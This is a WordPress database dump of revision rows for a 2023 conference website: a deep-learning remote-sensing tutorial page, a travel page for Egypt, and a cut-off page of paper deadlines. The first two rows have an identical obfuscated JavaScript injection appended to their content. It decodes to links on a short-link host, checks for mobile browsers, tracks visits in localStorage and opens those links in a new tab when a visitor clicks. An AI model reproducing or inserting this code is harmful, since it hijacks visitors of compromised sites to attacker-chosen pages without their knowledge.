(3798,1,'2023-02-05 10:04:19','2023-02-05 10:04:19','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3710\" img_size=\"1200x1000\"][vc_column_text]</p>\n<h5>Instructor</h5>\n<h6>Henry Leung</h6>\n<h6>Professor, Electrical and Software Engineering</h6>\n<h6>University of Calgary, Canada</h6>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"72\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\"><span style=\"font-size: 18pt;\">Deep Learning in Remote Sensing: Algorithms and Applications</span></h5>\n<p><span style=\"font-size: 14pt;\"><strong>Tutorial Topic</strong></span></p>\n<p style=\"text-align: justify;\"><strong>Deep learning algorithms have been widely used in remote sensing because of their effectiveness in image processing and computer vision. In this tutorial, we will present a review of selected deep learning algorithms that are popular in the remote sensing community including convolutional neural networks (CNN), generative adversarial networks (GAN), transformers, transfer learning, and meta learning. In the second half of the tutorial, we will present our research works on these deep learning algorithms in different remote sensing applications: 1) Synthetic aperture radar (SAR) target recognition based on cross-domain and cross-task transfer learning, 2) image generation using GAN and its application to SAR targe recognition, 3) image fusion based on transformers and GAN, 4) satellite image segmentation for different types of satellite images using deep neural networks such as deeplabs and efficient nets, 5) target recognition using meta-learning with shared and specific structures for SAR, and 6) style transfer using GAN to transform remote sensing images among different domains such as SAR and optical images.</strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<span style=\"font-size: 14pt;\"><strong><u>Speaker’s Bio</u></strong></span></p>\n<p style=\"text-align: justify;\">Henry Leung is a professor of the Department of Electrical and Computer Engineering of the University of Calgary. Before joining U of C, he was with the Department of National Defence (DND) of Canada as a defence scientist. His main duty there was to conduct research and development of automated surveillance systems, which can perform detection, tracking, identification and data fusion automatically as a decision aid for military operators. His current research interests include big data analytic,   chaos and nonlinear dynamics, information fusion, machine learning, signal and image processing, robotics and internet of things. He has published extensively in the open literature on these topics. He has over 350 journal papers and 250 refereed conference papers.  He is currently associate editor of Scietific Reports, IEEE Journal on Emerging and Special Topics on Circuits and Systems, Sensor Journal, IEICE Trans. Nonlinear Theory and its Applications, and Aerospace Systems He is the editor of the Springer book series on “Information Fusion and Data Science”. He is a Fellow of IEEE and SPIE.</p>\n<p>&nbsp;[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Deep Learning in Remote Sensing: Algorithms and Applications','','inherit','closed','closed','','3709-revision-v1','','','2023-02-05 10:04:19','2023-02-05 10:04:19','',3709,'https://gsw2023.com/?p=3798',0,'revision','',0),
(3799,1,'2023-02-05 10:10:35','2023-02-05 10:10:35','<p>[vc_row][vc_column][vc_column_text]</p>\n<p style=\"color: gray;\"><strong>Entry Visa:</strong></p>\n<ul>\n<li>\n<h6><strong>-Can be obtained at the Cairo International Airport upon arrival</strong></h6>\n</li>\n<li>\n<h6><strong>-Cost of the Visa: Tourist: US$15 (single- or multiple-entry)</strong></h6>\n</li>\n</ul>\n<p style=\"color: gray;\"><strong>Weather: <a style=\"color: black;\">in September: Around 30 degree in Cairo</a></strong></p>\n<ul>\n<li>\n<h6><strong>Cairo is reachable from over 70 countries through Egypt Air and Star Alliance members. The local organizing committee will apply to Star Alliance Convention Plus for additional discount on air tickets and a code will be provided to registered members</strong></h6>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Travel To Egypt','','inherit','closed','closed','','2675-revision-v1','','','2023-02-05 10:10:35','2023-02-05 10:10:35','',2675,'https://gsw2023.com/?p=3799',0,'revision','',0),
(3800,1,'2023-02-05 10:15:32','2023-02-05 10:15:32','<p>[vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5>Submission of Abstracts and Full Paper is Now Open</h5>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): 31 March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: 1 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): 15 April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" 